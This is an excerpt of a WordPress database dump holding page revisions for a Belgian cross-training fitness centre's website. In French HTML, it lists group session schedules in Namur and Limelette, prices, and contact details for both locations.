(379, 1, '2013-11-04 17:41:06', '2013-11-04 17:41:06', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>Team Training - Limelette :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b></b>18h\r\nCardio</td>\r\n<td class=\"trip\"><b>18h</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nRenforcement musculaire</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h45</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>18h45</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>18h45</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nCircuit training</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcardio\"><b>19h30</b>\r\nCardio</td>\r\n<td class=\"tglfe\"><b>19h30</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>19h30</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCardio</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '361-revision-v1', '', '', '2013-11-04 17:41:06', '2013-11-04 17:41:06', '', 361, 'http://www.crosstrainingcenter.be/361-revision-v1/', 0, 'revision', '', 0),
(380, 1, '2013-11-04 17:41:46', '2013-11-04 17:41:46', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>Team Training - Limelette :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b></b>18h\r\nCardio</td>\r\n<td class=\"trip\"><b>18h</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nRenforcement musculaire</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h45</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>18h45</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>18h45</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nCircuit training</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcardio\"><b>19h30</b>\r\nCardio</td>\r\n<td class=\"tglfe\"><b>19h30</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>19h30</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCardio</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '361-revision-v1', '', '', '2013-11-04 17:41:46', '2013-11-04 17:41:46', '', 361, 'http://www.crosstrainingcenter.be/361-revision-v1/', 0, 'revision', '', 0),
(381, 1, '2013-11-04 17:42:21', '2013-11-04 17:42:21', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>Team Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h</b>\r\nGLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nGLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b>\r\nTRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\" target=\"_blank\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2013-11-04 17:42:21', '2013-11-04 17:42:21', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(385, 1, '2013-11-04 17:48:51', '2013-11-04 17:48:51', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Limelette</h1>\r\n<iframe src=\"https://maps.google.be/maps?f=q&amp;source=s_q&amp;hl=fr&amp;geocode=&amp;q=Avenue+L%C3%A9on+Fournet,+20+-+Limelette+1342&amp;aq=&amp;sll=50.484709,4.855099&amp;sspn=0.050462,0.077162&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Avenue+L%C3%A9on+Fournet+20,+1342+Ottignies-Louvain-la-Neuve,+Brabant+Wallon,+R%C3%A9gion+wallonne&amp;t=m&amp;ll=50.676229,4.582672&amp;spn=0.032635,0.051498&amp;z=13&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Club Justine Henin\r\nAvenue Léon Fournet, 20\r\n1342 Limelette</address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Namur</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+Namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.472583,4.860764&amp;spn=0.065552,0.102997&amp;z=12&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Bowling et Squash de Namur\r\nChaussée de Perwez, 251\r\n5002 Namur</address><address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></address></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>&nbsp;</h1>\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]\r\n</td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>&nbsp;</h1>\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de\r\nTeam Training, Duo Training, Personnal\r\nTraining ou Coaching nutritionnel se\r\nfont exclusivement par téléphone.\r\n0485 / 92 . 02 . 12\r\n<h1></h1>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1 style=\"text-align: center;\"></h1>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-11-04 17:48:51', '2013-11-04 17:48:51', '', 9, 'http://www.crosstrainingcenter.be/9-revision-v1/', 0, 'revision', '', 0),
(382, 1, '2013-11-04 17:45:12', '2013-11-04 17:45:12', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Limelette</h1>\r\n<iframe src=\"https://maps.google.be/maps?f=q&amp;source=s_q&amp;hl=fr&amp;geocode=&amp;q=Avenue+L%C3%A9on+Fournet,+20+-+Limelette+1342&amp;aq=&amp;sll=50.484709,4.855099&amp;sspn=0.050462,0.077162&amp;gl=be&amp;ie=UTF8&amp;hq=&amp;hnear=Avenue+L%C3%A9on+Fournet+20,+1342+Ottignies-Louvain-la-Neuve,+Brabant+Wallon,+R%C3%A9gion+wallonne&amp;t=m&amp;ll=50.676229,4.582672&amp;spn=0.032635,0.051498&amp;z=13&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Club Justine Henin\r\nAvenue Léon Fournet, 20\r\n1342 Limelette</address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Namur</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+Namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.472583,4.860764&amp;spn=0.065552,0.102997&amp;z=12&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Bowling et Squash de Namur\r\nChaussée de Perwez, 251\r\n5002 Namur</address><address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></address></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>&nbsp;</h1>\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]\r\n</td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>&nbsp;</h1>\r\n<div id=\"rdv\"></div>\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de\r\nTeam Training, Duo Training, Personnal\r\nTraining ou Coaching nutritionnel se\r\nfont exclusivement par téléphone.\r\n0485 / 92 . 02 . 12\r\n<h1></h1>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1 style=\"text-align: center;\"></h1>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-11-04 17:45:12', '2013-11-04 17:45:12', '', 9, 'http://www.crosstrainingcenter.be/9-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(384, 1, '2013-11-04 17:47:17', '2013-11-04 17:47:17', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>Team Training - Limelette :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b></b>18h\r\nCardio</td>\r\n<td class=\"trip\"><b>18h</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nRenforcement musculaire</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h45</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>18h45</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>18h45</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nCircuit training</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcardio\"><b>19h30</b>\r\nCardio</td>\r\n<td class=\"tglfe\"><b>19h30</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>19h30</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCardio</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '361-revision-v1', '', '', '2013-11-04 17:47:17', '2013-11-04 17:47:17', '', 361, 'http://www.crosstrainingcenter.be/361-revision-v1/', 0, 'revision', '', 0),
(383, 1, '2013-11-04 17:46:22', '2013-11-04 17:46:22', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>Team Training - Limelette :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b></b>18h\r\nCardio</td>\r\n<td class=\"trip\"><b>18h</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nRenforcement musculaire</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h45</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>18h45</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>18h45</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nCircuit training</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcardio\"><b>19h30</b>\r\nCardio</td>\r\n<td class=\"tglfe\"><b>19h30</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>19h30</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCardio</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9#rdv\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9#rdv\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9#rdv\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '361-revision-v1', '', '', '2013-11-04 17:46:22', '2013-11-04 17:46:22', '', 361, 'http://www.crosstrainingcenter.be/361-revision-v1/', 0, 'revision', '', 0),
